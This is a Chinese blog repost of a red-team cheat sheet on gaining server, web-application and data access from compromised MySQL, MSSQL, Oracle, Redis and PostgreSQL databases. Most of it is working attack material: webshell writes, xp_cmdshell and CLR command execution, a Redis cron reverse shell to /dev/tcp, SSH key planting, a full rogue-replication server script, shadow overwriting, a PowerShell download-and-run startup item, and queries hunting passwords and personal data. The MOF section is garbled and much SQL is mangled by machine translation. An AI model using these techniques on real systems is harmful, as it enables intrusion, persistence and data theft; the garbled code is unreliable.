数据库提权利用

最新推荐文章于 2024-12-05 11:51:02 发布
最新推荐文章于 2024-12-05 11:51:02 发布
阅读量1.5k 收藏 5
点赞数
CC 4.0 BY-SA版权
文章标签: mysql 数据库
原文链接:https://mp.weixin.qq.com/s/VgXOXVl-Bx2Vi8BYxdx3CA

0x01 概述

该文章文章总结在国家级攻防演练中数据库相关利用,旨在帮助红队队员在拿下数据库权限后快速获取服务器权限、WEB应用权限、数据,请勿利用。

该文章不会将所有的利用方式进行总结,因为有一些利用方式非常鸡肋,需要特别说明,文章总结了在实战中采用的方式并且有益的利用。

0x02 数据库->服务器权限

建议大家在实战中直接使用工具,当使用工具遇到问题时可通过以下步骤进行调试

网上有成熟的数据库利用工具:https : //github.com/SafeGroceryStore/MDUT

mysql

- UDF提权

使用条件

  • secure-file-priv 不为NULL

  • 存在\lib\plugin目录

  1. 确定--secure-file-priv参数,值为NULL则无法提权

显示像'%secure%'这样的全局变量;

图片

  1. 确定mysql版本,对应udf.dll版本

显示诸如“%version%”之类的变量;

图片

  1. 将udf.dll代码的16进制数声明给my_udf_a变量

使用mysql;
set @my_udf_a=concat('',dll的16进制);

  1. 建表my_udf_data,字段为data,类型为longblob

创建表 my_udf_data(data LONGBLOB);

  1. @my_udf_a 插入表my_udf_data

insert into my_udf_data values("");update my_udf_data set data = @my_udf_a;

  1. 查看udf.dll的导出路径

显示变量,如 '%plugin%';

图片

  1. 将udf.dll导出

从 my_udf_data 中选择数据到 DUMPFILE 'D:/hack/phpstudy/PHPTutorial/MySQL/lib/plugin/udftest.dll';

  1. 创建cmd函数

创建函数 sys_eval 返回字符串 soname 'udftest.dll';

  1. 命令执行

选择 sys_eval('whoami');

图片

  1. 附:各版本的udf.dll的hex,参考MDUT,固定了只允许创建sys_eval函数

- 提权

使用条件

  • secure-file-priv参数为空

  • mysql服务权限为管理员

  1. 生成mof文件

pace("\.rootsubscription") 

**EventFilter 实例为 $EventFilter{ EventNamespace = "RootCimv2"; 名称 = "filtP2"; Query = "Select * From **InstanceModificationEvent " 
            "Where TargetInstance Isa "Win32_LocalTime" " 
            "And TargetInstance.Second = 5"; 
    QueryLanguage = "WQL"; 
}; 

ActiveScriptEventConsumer 实例为 $Consumer 
{ 
    Name = "consPCSV2"; 
    ScriptingEngine = "JScript"; 
    ScriptText = 
    "var WSH = new ActiveXObject("WScript.Shell")nWSH.run("net.exe user admin admin /add")"; 
}; 

__FilterToConsumerBinding 实例
{ 
    Consumer = $Consumer; 
    过滤器 = $EventFilter; 
};

  1. 导入nullevt.mof文件

选择CHAR(35,112,114,97,103,109,97,32,110,97,109,101,115,112,97,99,101,40,34,92,92,92,92,46,92,92,114,111,111,116,92,92,115,117,98,115,99,114,105,112,116,105,111,110,34,41,13,10 ,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,69,118,101,110,116,70,105,108,116,101,114,32,97,115,32,36,69,118,101,110,116,70,105,108,116,101,114,13,10,123,13,10,32,32,32,32,69,118,101,110,116 ,78,97,109,101,115,112,97,99,101,32,61,32,34,82,111,111,116,92,92,67,105,109,118,50,34,59,13,29,123,3,232,103,32,103,39,320,39 ,61,32,34,102,105,108,116,80,50,34,59,13,10,32,32,32,32,81,117,101,114,121,32,61,32,34,83​​,101,10,19,101,16,19,32,101,109,101,16,19,32,101,109,101,199 ,95,95,73,110,115,116,97,110,99,101,77,111,100,105,102,105,99,97,116,105,111,110,69,118,101,23,3,2,3,3,2,3,3,2,3,3,2,3,3,2,3,3,3,2,3,3,2,3,3,2,3,3,3,2 ,34,87,104,101,114,101,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,32,73,115,97,32,92,34,87,105,110,51,50,95,76,111,99,97,108,84,105,109,101,92,34,32,3,3,3,3,3 32,32,32,32,32,32,32,32,32,34,65,110,100,32,84,97,114,103,101,116,73,110,115,116,97,110,99,103,10,310,310,310,310,103,101,310,310,103,101,310 59、13、10、32、32、32、32、81、117、101、114、121、76、97、110、103、117、97、103、101、32、61、32、34、87、81、76、34、519、109、34、519、101 13,10,105,110,115,116,97,110,99,101,32,111,102,32,65,99,116,105,118,101,83,99,114,105,112,116,69,118,101,110,116,67,111,110,115,117,109,101,114,32,97,115,32,36,67,111,110,115,117,109,101,114,13,10,123,13,10,32,32,32,32, 78,97,109,101,32,61,32,34,99,111,110,115,80,67,83,86,50,34,59,13,10,32,32,32,32,83,99,114,105,112,116,105,110,103,69,110,103,105,110,101,32,61, 32,34,74,83,99,114,105,112,116,34,59,13,10,32,32,32,32,83,99,114,105,112,116,84,101,120,116,132,13,3,32,32,32,32,30 97,114,32,87,83,72,32,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,92,34,87,83,99,114,105,112,116,46,83,104,101,108,108,92,34,41,92,110,87, 83,72,46,114,117,110,40,92,34,110,101,116,46,101,120,101,32,108,111,99,97,108,103,114,111,117,112,32,97,100,109,105,110,105,115,116,114,97,116,111,114,115,32,97,100,109,105,110,32,47,97,100,100,92,34,41,34,59,13,10, 32,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,70,105,108,116,101,114,84,111,67,111,110,115,117,109,101,114,66,105,110,100,105,110,103,13,10,123,13,10,32,32,32,32,67,111,110,115,117,109,101,114, 32,32,32,61,32,36,67,111,110,115,117,109,101,114,59,13,10,32,32,32,32,70,105,108,116,101,114,32,61,32,36,69,118,101,110,116,70,105,108,116,101,114,59,13,10,125,59)转储文件 'c:/Windows/system32/wbem/mof/nullevt.mof';118,101,88,79,98,106,101,99,116,40,92,34,87,83,99,114,105,112,116,46,83,104,101,108,108,92,34,41,92,110,87,83,72,46,114,117,110,40,92,34,110,101,116,46,101,120,101, 32,108,111,99,97,108,103,114,111,117,112,32,97,100,109,105,110,105,115,116,114,97,116,111,114,115,32,97,100,109,105,110,32,47,97,100,100,92,34,41,34,59,13,10,32,125,59,13,10,13,10,105,110,115,116,97,110, 99,101,32,111,102,32,95,95,70,105,108,116,101,114,84,111,67,111,110,115,117,109,101,114,66,105,110,100,105,110,103,13,10,123,13,10,32,32,32,32,67,111,110,115,117,109,101,114,32,32,32,61,32,36,67,111,110,115,117,109,101,114, 59,13,10,32,32,32,32,70,105,108,116,101,114,32,61,32,36,69,118,101,110,116,70,105,108,116,105,108,116,101,114,32,61,32,36,69,118,101,110,116,70,105,108,116,101,108,116,101,114,32,61,32,36,69,118,101,110,116,70,105,108,116,101,50,13/c/3,101,50,114,101,50,13/3/3,59,114,109,13 nullevt.mof';118,101,88,79,98,106,101,99,116,40,92,34,87,83,99,114,105,112,116,46,83,104,101,108,108,92,34,41,92,110,87,83,72,46,114,117,110,40,92,34,110,101,116,46,101,120,101, 32,108,111,99,97,108,103,114,111,117,112,32,97,100,109,105,110,105,115,116,114,97,116,111,114,115,32,97,100,109,105,110,32,47,97,100,100,92,34,41,34,59,13,10,32,125,59,13,10,13,10,105,110,115,116,97,110, 99,101,32,111,102,32,95,95,70,105,108,116,101,114,84,111,67,111,110,115,117,109,101,114,66,105,110,100,105,110,103,13,10,123,13,10,32,32,32,32,67,111,110,115,117,109,101,114,32,32,32,61,32,36,67,111,110,115,117,109,101,114, 59,13,10,32,32,32,32,70,105,108,116,101,114,32,61,32,36,69,118,101,110,116,70,105,108,116,105,108,116,101,114,32,61,32,36,69,118,101,110,116,70,105,108,116,101,108,116,101,114,32,61,32,36,69,118,101,110,116,70,105,108,116,101,50,13/c/3,101,50,114,101,50,13/3/3,59,114,109,13 nullevt.mof';34,41,92,110,87,83,72,46,114,117,110,40,92,34,110,101,116,46,101,120,101,32,108,111,99,97,108,103,114,111,117,112,32,97,100,109,105,110,105,115,116,114,97,116,111,114,115,32,97,100,109,105,110,32,47,97,100,100,92,34,41, 34,59,13,10,32,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,70,105,108,116,101,114,84,111,67,111,110,115,117,109,101,114,66,105,110,100,105,110,103,13,10,123,13,10,32, 32,32,32,67,111,110,115,117,109,101,114,32,32,32,61,32,36,67,111,110,115,117,109,101,114,59,13,10,32,32,32,32,70,105,108,116,101,114,32,61,32,36,69,118,101,110,116,70,105,108,116,101,114, 59,13,10,125,59) 到转储文件 'c:/Windows/system32/wbem/mof/nullevt.mof';34,41,92,110,87,83,72,46,114,117,110,40,92,34,110,101,116,46,101,120,101,32,108,111,99,97,108,103,114,111,117,112,32,97,100,109,105,110,105,115,116,114,97,116,111,114,115,32,97,100,109,105,110,32,47,97,100,100,92,34,41, 34,59,13,10,32,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,70,105,108,116,101,114,84,111,67,111,110,115,117,109,101,114,66,105,110,100,105,110,103,13,10,123,13,10,32, 32,32,32,67,111,110,115,117,109,101,114,32,32,32,61,32,36,67,111,110,115,117,109,101,114,59,13,10,32,32,32,32,70,105,108,116,101,114,32,61,32,36,69,118,101,110,116,70,105,108,116,101,114, 59,13,10,125,59) 到转储文件 'c:/Windows/system32/wbem/mof/nullevt.mof';109,105,110,32,47,97,100,100,92,34,41,34,59,13,10,32,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,70,105,108,116,101,114,84,111, 67,111,110,115,117,109,101,114,66,105,110,100,105,110,103,13,10,123,13,10,32,32,32,32,67,111,110,115,117,109,101,114,32,32,32,61,32,36,67,111,110,115,117,109,101,114,59,13,10,32,32,32,32, 70,105,108,116,101,114,32,61,32,36,69,118,101,110,116,70,105,108,116,101,114,59,13,10,125,59'of/mwm/system/dmpbe/system/cwmnull 文件/c/3109,105,110,32,47,97,100,100,92,34,41,34,59,13,10,32,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,70,105,108,116,101,114,84,111, 67,111,110,115,117,109,101,114,66,105,110,100,105,110,103,13,10,123,13,10,32,32,32,32,67,111,110,115,117,109,101,114,32,32,32,61,32,36,67,111,110,115,117,109,101,114,59,13,10,32,32,32,32, 70,105,108,116,101,114,32,61,32,36,69,118,101,110,116,70,105,108,116,101,114,59,13,10,125,59'of/mwm/system/dmpbe/system/cwmnull 文件/c/332,61,32,36,69,118,101,110,116,70,105,108,116,101,114,59,13,10,125,59) 到转储文件 'c:/Windows/system32/wbem/mof/'nullevt.32,61,32,36,69,118,101,110,116,70,105,108,116,101,114,59,13,10,125,59) 到转储文件 'c:/Windows/system32/wbem/mof/'nullevt.

- 写入webshel​​l到网站目录

使用条件

  • secure-file-priv 参数为空或者为网站根路径

  • 知道网站的绝对路径

  1. 写一句话到网站根目录

选择 '<?php @eval($_POST[shell]); ?>' 进入输出文件 'D:/hack/phpstudy/PHPTutorial/WWW/shell.php';

- 写入webshel​​l到日志general_log

使用条件

  • 知道网站的绝对路径

  1. 开启general_log

设置全局 general_log='on';

  1. 设置日志位置

SET global general_log_file='D:/hack/phpstudy/PHPTutorial/WWW/cmd.php';

  1. 写成一句话到日志文件

SELECT '<?php assert($_POST["cmd"]);?>';

- 写入webshel​​l到慢查询

使用条件

  • 知道网站的绝对路径

  1. 开启慢查询日志

设置全局slow_query_log=1;

  1. 设置日志位置

设置全局slow_query_log_file='D:/hack/phpstudy/PHPTutorial/WWW/low.php';

  1. 写成一句话到慢查询文件

选择 "<?php @eval($_POST['cmd'])?>" 或 sleep(11);

mssql

- xp_cmdshell提权

使用条件

  • 拥有DBA权限

  1. 判断当前是否为DBA权限,为1则可以提权

select is_srvrolemember('sysadmin');

  1. 开启xp_cmdshell

EXEC sp_configure '显示高级选项', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;

  1. xp_cmdshell命令执行

exec master..xp_cmdshell whoami;

- Ole 自动化程序提权

使用条件

  • 拥有DBA权限

  1. 判断当前是否为DBA权限,为1则可以提权

select is_srvrolemember('sysadmin');

  1. 开启Ole自动化程序

EXEC sp_configure '显示高级选项', 1; 用覆盖重新配置;EXEC sp_configure 'Ole 自动化程序', 1; RECONFIGURE WITH OVERRIDE;EXEC sp_configure '显示高级选项', 0;

  1. 以多种方式执行

  • wscript.shell组件

声明@luan int,@exec int,@text int,@str varchar(8000)
exec sp_oacreate 'wscript.shell',@luan output
exec sp_oamethod @luan,'exec',@exec output,'C:\\Windows\ \System32\\cmd.exe /c whoami'
exec sp_oamethod @exec, 'StdOut', @text out
exec sp_oamethod @text, 'readall', @str out
select @str;

图片

  • com组件

声明@luan int,@exec int,@text int,@str varchar(8000)
exec sp_oacreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',@luan 输出
exec sp_oamethod @luan,'exec',@exec 输出,'C:\\Windows\\System32\\cmd.exe /c whoami'
exec sp_oamethod @exec, 'StdOut', @text out
exec sp_oamethod @text, 'readall', @str out
select @str;

图片

- JobAgent提权

使用条件

  • 拥有DBA权限

  • 需要sqlserver代理(sqlagent)开启

  1. 尝试开启sqlagent

exec master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT';

  1. 利用任务计划命令执行(无回显)

使用 msdb;
EXEC dbo.sp_add_job @job_name = N'testjob'
EXEC sp_add_jobstep @job_name = N'testjob',@step_name = N'testjob',@subsystem = N'CMDEXEC',@command = N'whoami',@retry_attempts = 1, @retry_interval = 5
EXEC dbo.sp_add_jobserver @job_name = N'testjob'
EXEC dbo.sp_start_job N'testjob';

- CLR提权

使用条件

  • 拥有DBA权限

  1. 开启CLR

exec sp_configure '显示高级选项','1';reconfigure;exec sp_configure 'clr enabled','1';reconfigure;exec sp_configure '显示高级选项','1';

  1. 导入CLR插件

CREATE ASSEMBLY [MDATKit]
AUTHORIZATION [dbo]
FROM 0x16密码的dll
WITH PERMISSION_SET = UNSAFE;
[16进制的dll](https://github.com/SafeGroceryStore/MDUT/blob/main/MDAT-DEV/src/main/Plugins/Mssql/clr.txt)

  1. 创建CLR函数

创建程序 [dbo].[kitmain]
@method NVARCHAR (MAX) ,@arguments NVARCHAR (MAX)
作为 EXTERNAL NAME [MDATKit].[StoredProcedures].[kitmain]

  1. kitmain函数命令执行

exec kitmain 'cmdexec',N'whoami'

图片

- 存储过程写webshel​​l

使用条件

  • 拥有DBA权限

  • 知道的网站绝对路径

  1. 判断当前是否为DBA权限,为1则可以提权

select is_srvrolemember('sysadmin');

  1. 利用存储过程写入一句话

声明@o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'C:\xxxx\www\test. asp', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'<%execute(request("a"))%>'

- 日志写webshel​​l

使用条件

  • 拥有DBA权限

  • 知道的网站绝对路径

  1. 判断当前是否为DBA权限,为1则可以提权

select is_srvrolemember('sysadmin');

  1. 利用存储过程写入一句话

更改数据库库名集 RECOVERY FULL
创建表 cmd (a image)
备份日志库名到磁盘 = 'c:\' with init
insert into cmd (a) values (0x3C2565786563757465287265717565737428226122229295)
备份到磁盘上的日志 = 'c:\' \www\2.asp'

——沙盒提权

使用条件

  • 拥有DBA权限

  • sqlserver服务权限为system

  • 服务器拥有jet.oledb.4.0驱动

  1. 修改注册表,关闭沙盒模式

EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0

  1. 命令执行

Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("whoami")');

甲骨文

-创建java函数提权

使用条件

  • dba权限

  1. 使用sqlplus连接

系统/系统@192.168.117.66:1521/orcl

  1. 赋权

开始 dbms_java.grant_permission('PUBLIC', 'SYS:java.io.FilePermission', '<<ALL FILES>>', 'read,write,execute,delete');end;
/

  1. 创建java代码

创建或替换并编译名为 exe_linux 的 java 源作为
导入 java.io.BufferedReader;
导入 java.io.InputStream;
导入 java.io.InputStreamReader;
导入 java.net.UnknownHostException;
public class Test
{
public static String list_cmd(String str){
    Runtime runtime=Runtime.getRuntime();
  StringBuffer enco = new StringBuffer();
  enco.append("GBK");
  try{
  进程 proc =runtime.exec(str);
  InputStream inp_suc=proc.getInputStream();
  InputStream inp_err=proc.getErrorStream();
  BufferedReader bfr_err = new BufferedReader(new InputStreamReader(inp_err,enco.toString()));
  BufferedReader bfr_suc = new BufferedReader(new InputStreamReader(inp_suc,enco.toString()));
    字符串 strLine;
      while( (strLine=(bfr_suc.readLine())) != null){       System.out.println(strLine);           }   while( (strLine=(bfr_err.readLine())) != null){     System.out.println(strLine);     }         proc.destroy();         inp_suc.close();         inp_err.close();     }catch (Exception e) {       System.out.println("EXECUTE IS ERROR!");       System.out.println(e.getMessage());     }     返回"";   }   /* public static void main(String[] args){       list_cmd(args[0]);
     



     











     

     

    }
    **/
}

/

  1. 创建存储过程

创建或替换过程 p_exe_linux(str varchar2) 作为语言 java
名称 'Test.list_cmd(java.lang.String)';
/

  1. 命令执行

SET SERVEROUTPUT ON
exec dbms_java.set_output(1111111111111);
EXEC P_EXE_LINUX('whoami');

图片

Redis

- 计划任务反弹壳

使用条件

  • 出网

  • redis服务为root权限

  • linux

  1. 反弹壳

config set dir /var/spool/cron/ 
config set dbfilename root 
set xxx "\n\n\n* * * * * bash -i >&/dev/tcp/ip/端口 0>&1\n\n\n "
保存

- 写入ssh公钥getshell

使用条件

  • redis服务为root权限

  • 允许使用登录

  • linux

  1. 写入密钥

config set dir /root/.ssh 
config set dbfilename authorized_keys 
set xxssh "\n\nssh-rsa xxxxxx\n\n" 
save

- 写入webshel​​l提权

使用条件

  • 知道网站的绝对路径

  • 拥有网站目录的写权限

  1. 写入webshel​​l

config set dir /home/web/wwwroot/ 
config set dbfilename xxx.php 
set xxphp "\n\n<?php eval($_REQUEST['x']); ?>\n\n" 
save

- 主从复制恶意.so文件getshell

使用条件

  • Redis 4.x/5.x

  • 出网

  • linux

  1. 在vps上开启redis从服务,提供exp.so

python3 redis-cus-rogue.py 21000 exp.so

redis-cus-rogue.py

#!/usr/bin/env python3 
import os 
import sys 
import argparse 
import socketserver 
import logging 
import socket
导入时间

DELIMITER = b"\r\n" 

class RoguoHandler(socketserver.BaseRequestHandler): 
    def decode(self, data): 
        if data .startswith(b'*'): 
            return data.strip().split(DELIMITER)[2::2] 
        if data.startswith(b'$'): 
            return data.split(DELIMITER, 2)[1] 

        return data.strip().split() 

    def handle(self): 
        while True: 
            data = self.request.recv(1024) 
            logging.info("receive data: %r", data) 
            arr = self.decode(data)
            if arr[0].startswith(b'PING'): 
                self.request.sendall(b'+PONG' + DELIMITER) 
            elif arr[0].startswith(b'REPLCONF'): 
                self.request.sendall(b' +OK' + DELIMITER) 
            elif arr[0].startswith(b'PSYNC') 或 arr[0].startswith(b'SYNC'): 
                self.request.sendall(b'+FULLRESYNC ' + b'Z' * 40 + b' 1' + DELIMITER) 
                self.request.sendall(b'$' + str(len(self.server.payload)).encode() + DELIMITER) 
                self.request.sendall(self.server.payload + DELIMITER) 
                break 

        self.finish() 

    def finish(self): 
        self.request.close()


类 RoguoServer(socketserver.TCPServer):
    allow_reuse_address = True 

    def __init__(self, server_address, payload): 
        super(RoguoServer, self).__init__(server_address, RoguoHandler, True) 
        self.payload = payload 


if __name__ == "__main__": 
    if len(sys.argv)< 2 : 
        print("python [port] [filename]") 
        print("python 21000 exp.so") 
        exit(0) 

    lport = int(sys.argv[1]) 
    expfile = sys.argv[2] 
    with open(expfile , 'rb') as f: 
        server = RoguoServer(('0.0.0.0', lport), f.read()) 
    print("流氓服务器启动%d端口"%lport) 
    server.handle_request() 
    print("接收客户请求")

  1. redis加载远程exp.so目标命令执行

#设置redis的备份路径为当前目录
    config set dir ./ 
#设置备份文件名称exp.so,默认为dump.rdb 
    config set dbfilename exp.so 
#设置主服务器IP和端口
    slaveof 192.168.172.129 21000   
#加载恶意模块
    module load ./exp.so 
#关闭主从,关闭复制功能
    slaveof no one 
#执行系统命令
    system.exec 'whoami'

- 主从复制覆写shadow

使用条件

  • Redis 4.x/5.x

  • 出网

  • linux

  • redis服务权限为root

  1. 在vps上开启redis从服务,提供shadow文件

python3 redis-cus-rogue.py 21000 影子

  1. 目标redis远程加载shadow,覆盖原始shadow

config set dir /etc/ 
config set dbfilename shadow 
slaveof 192.168.172.129 21000

- 写入启动提权

使用条件

  • 需要启动项目录的写入权限

  • 温沃斯

  • 服务器需要重启

  1. 写入启动项

config set dir "C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/startup/" 
config set dbfilename shell.bat 
set x "\r\n\r\npowershell -windowstyle hidden -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://xxx.xxx.xxx.2/shell.ps1');xx.ps1\"\r\n\r\n" 
save

Postgre

- 写入webshel​​l

使用条件

  • 拥有网站的权限

  • 知道网站绝对路径

  1. 写入webshel​​l

复制 (选择 '<?php phpinfo();?>') 到 '/tmp/1.php';

- CVE-2019-9193

使用条件

  • 版本9.3-11.2

  • 超级用户或者pg_read_server_files组中的任何用户

  1. 命令执行

删除表如果存在 cmd_exec; 
     创建表 cmd_exec(cmd_output text); 
     从 PROGRAM 'whoami' 复制 cmd_exec; 
     选择 * 从 cmd_exec;

图片

- CVE-2019-9193

使用条件

  • 版本9.3-11.2

  • 超级用户或者pg_read_server_files组中的任何用户

  1. 命令执行

删除表如果存在 cmd_exec; 
     创建表 cmd_exec(cmd_output text); 
     从 PROGRAM 'whoami' 复制 cmd_exec; 
     选择 * 从 cmd_exec;

0x03 数据库->WEB应用权限

通过SQL语句快速查询数据库中WEB应用后台的账号密码,获取WEB应用权限分

mysql

  1. 查看数据库连接情况:

显示进程列表;

图片

  1. xx库中所有字段名带通|密码的表

从 information_schema.columns 中选择不同的 table_name,其中 table_schema="xx" 和 column_name 像 "%pass%" 或 column_name 像 "%pwd%"

图片

  1. 获取WEB应用账号密码

从 car.sys_user 中选择 *

图片

mssql

  1. 查看xx数据库连接的IP

select DISTINCT client_net_address,local_net_address from sys.dm_exec_connections where Session_id IN (select session_id from sys.dm_exec_Sessions where host_name IN (SELECT hostname FROM master.dbo.sysprocesses WHERE DB_NAME(dbid) = 'xx'));

图片

  1. xx库中所有字段名带通|密码的表

select [name] from [xx].[dbo].sysobjects where id in(select id from [xx].[dbo].syscolumns where name like '%pass%' or name like '%pwd%')

图片

  1. 获取WEB应用账号密码

从 [test].[dbo].test1 中选择 *

图片

甲骨文

  1. 查看用户数据库连接的IP

从 v$session s 中选择 username,program,machine,client_info,sys_context('userenv','ip_address') 作为 ipadd,其中用户名不是空顺序,按用户名、程序、机器排序;

图片

  1. 用户库中所有字段名带pass|pwd的表

SELECT * FROM USER_TAB_COLUMNS WHERE column_name LIKE '%PASS%' OR column_name LIKE '%PWD%';

  1. 获取WEB应用账号密码

SELECT * FROM 库名.表名;

0x04 数据库->数据

通过SQL语句快速查询数据库中的大量分项、重要数据,获取数据

mysql

  1. xx库中所有表,按数据排序

select table_name,table_rows from information_schema.tables where table_schema='xx' order by table_rows desc;

  1. xx 库中所有字段名带个人信息的表

从 information_schema.columns 中选择不同的 table_name where table_schema="xx" and column_name regexp "name|phone|mobile|certificate|number|email|addr|card|电话|地址|他的|姓名"

mssql

  1. xx库中所有表,按数据排序

SELECT a.name,b.rows FROM xx..sysobjects a INNER JOIN xx..sysindexes b ON a.id=b.id WHERE b.indid IN(0,1) AND a.Type='u' ORDER BY b .rows DESC

  1. xx 库中所有字段名带个人信息的表

select [name] from [xx].[dbo].sysobjects where id in(select id from [xx].[dbo].syscolumns where name like '%name%' or name like '%phone%' or name like ' %mobile%' 或类似“%certificate%”的名称或类似“%number%”的名称或类似“%email%”的名称或类似“%addr%”的名称或类似“%card%”的名称或类似“%电话”的名称%”或类似“%地址%”的名称或类似“%身份证%”的名称或类似“%姓名%”的名称)

甲骨文

  1. 用户库中所有表,按字段数排序

从 user_tables t ORDER BY NUM_ROWS DESC 中选择 t.table_name,t.num_rows;

  1. 用户库中所有字段名带个人信息的表

SELECT * FROM USER_TAB_COLUMNS WHERE regexp_like(column_name,'NAME|PHONE|MOBILE|CERTIFICATE|NUMBER|EMAIL|ADDR|CARD|电话|地址|他的|姓名')

qq_43608955
关注
sqlserver clr学习
问题很多的小明
05-06 724
利用sqlserver clr或者执行命令 准备源文件C:\cmd_exec.cs: using System; using System.Data; using System.Data.SqlClient; using System.Data.SqlTypes; using Microsoft.SqlServer.Server; using System.IO; using System.Diagnostics; using System.Text; public partial clas
SQL Server系列
2301_77152761的博客
04-11 302
CLR 为托管代码供服务,例如跨语言集成、代码访问安全性、对象生存期管理以及调试和分析支持。编写存储过程、触发器、用户定义类型、用户定义函数(标量函数和表值函数)以及用户定义的聚合函数。3、设置项目属性,目标平台修改为需要的目标平台,如SQL Server 2012;6、填入代码以后进行编译,之后到编译目录下可以看到一个dacpac后缀的文件。4、右键项目,选择添加->新建项,新建SQL CLR C# 存储过程。7、双击此文件进行解压,将解压出一个名为mode.sql的文件。
数据库到服务器
zyw268的博客
05-29 610
GRANT ALL PRIVILEGES ON *.* TO '帐号'@'%' IDENTIFIED BY '密码' WITH GRANT OPTION;条件:ROOT密码(高版本的-secure-file-priv没进行目录限制)-Oracle:(站库分离,非JSP,直接数据库到系统等)Databasetools //bug多。-MSSQL:.NET+MSSQL 以web入口。-MYSQL:PHP+MYSQL 以web入口。技术:CVE-2019-9193 UDF libc。
数据库Mysql
白帽黑客鹏哥的博客
05-29 1868
UDF(user defined function)⽤户⾃定义函数,是 mysql 的⼀个拓展接⼝。⽤户可以通过⾃定义函数实现在mysql中⽆法⽅便实现的功能,其添加的新函数都可以在 sql 语句中调⽤,就像调⽤本机函数⼀样。 先前条件关于mysql的密码,可以通过假设的网站的配置文件获取,如login.php、config.inc.php等文件获取在默认情况下,mysql只允许本地登录,我们知道可以通过navicat去连接数据库(在知道帐号密码的情况下),但是如果只允许本地登录的情况下,即使知道账号密码的
SQlserver方法
渗透之路,攻防之间皆学问
05-24 2976
sql server(执行命令)主要依赖于sql server自带的存储过程。目的:sqlserver限 —> 系统限存储过程是一个可编程的函数,它在数据库中创建并保存,是存储在服务器中的一组预编译过的T-SQL语句。数据库中的存储过程可以看做是对编程中面向对象方法的模拟。它允许控制数据的访问方式(可以将存储过程理解为函数调用的过程),使用execute命令执行存储过程。主要分为系统存储过程、扩展存储过程、用户自定义的存储过程三大类。
Windows数据库-mysql&mssql&Oracle数据库
网络空间安全学习
04-01 1564
Windows-数据库-MySQL-MSSQL-Oracle MySQL UDF、反弹shell、启动项、mof MSSQL系统函数-使用系统函数 Oracle 数据库 可使用Oracle shell工具进行操作
数据库(实战案例)
2201_75341517的博客
06-13 1949
本文主要介绍常见数据库如何进行操作,如mysql(mof,udf,启动项),mssql,orcale数据库
数据库
weixin_71169068的博客
04-16 1149
利用此方法第一步先判断版本和安装路径:1.mysql5.1 则 导出dll文件到安装目录 /lib/plugin(这个目录默认是没有的,需要我们去创建)查看版本:mysql=>5.1跳转到安装目录发现lib目录下没有plugin,这里需要我们新建目录点击mysql,设置好路径,安装DLL执行命令,从而
-MY&MS&ORA数据库
qi_SJQ_的博客
02-01 1691
数据库: 在利用系统溢出漏洞无果的情况下,可以采用数据库进行来获得系统限,不是数据库用户的限,但需要知道数据库的前条件:服务器开启数据库服务及获取到最高限用户密码。除 Access 数据库外,其他数据库基本都存在数 据库的可能。 #数据库应用升中的意义 #WEB 或本地环境如何探针数据库应用 #数据库限用户密码收集等方法 #目前数据库对应的技术及方法等 流程:服务探针->信息收集->利用->获取限 探针查看是否...
SQLSERVER使用的CLR常用函数
06-26
必须SQLSERVER2005以上,支持CLR函数才行。 其中Concatenate是拼接字符串的聚合函数,MaxOther是某列最大时获取另外一列值的聚合函数,MinOther则反之。 Regex开头的函数是正则相关的函数。GetCodeTable是拆分字符串到编码,GetIdTable是拆分字符串到数字的表值函数。
SQL Server 数据库常见总结
m0_64481831的博客
03-28 4243
前面总结了linux和Windows的方式以及Mysql,这篇文章讲讲SQL Server数据库
MSSQL之二十二 CLR及SQL
张晨光老师的播客
09-07 1826
在SQL Server中使用CLR调用.NET方法介绍我们一起来做个示例,在.NET中新建一个类,并在这个类里新建一个方法,然后在SQL Server中调用这个方法。按照微软所述,通过宿主 Microsoft .NET Framework 2.0 公共语言运行库 (CLR),SQL Server 2005显著地增强了数据库编程模型。 这使得开发人员可以用任何CLR语言(如C#、VB.NET或C+
红队武器更新:数据库杀器 MDUT增强版
wananxuexihu的博客
12-05 948
MDUT-相信很多红队的师傅对此工具已经很了解了,笔者在日常的攻防中也经常使用此工具.但使用时笔者发现此工具在对数据库进行利用时存在诸多问题,以至于不得不手动的去连接数据库进行测试.对此笔者对原版的MDUT进行了一系列功能上的增强和优化,经过一周的缝缝补补大概修复了近10几处的问题。现在用起来顺手了不少,为此笔者编译了一版修改后的版本供师傅们使用,希望帮助师傅们在日后的攻防中更加的得心应手.
redis mysql oracle mssql postgresql工具mdut
qq_55894976的博客
08-20 874
mdut用于数据库的连接,连接成功后可用户反弹shell,命令执行。
【亲测免费】 MDUT 安装和配置指南
gitblog_07777的博客
09-13 1147
MDUT 安装和配置指南 1. 项目基础介绍和主要编程语言 MDUT(Multiple Database Utilization Tools)是一款中文的数据库跨平台利用工具,集合了多种主流的数据库类型。该项目基于前人 SQLTOOLS 的基础开发,旨在将常见的数据库利用手段集合在一个程序中,打破各种数据库利用工具需要各种环境导致使用不便的隔阂。MDUT 使用 Java 作为主要编程语言,并采用 ...
记一次实验:redis未授到cs上线(windows)
weixin_43875708的博客
02-01 1407
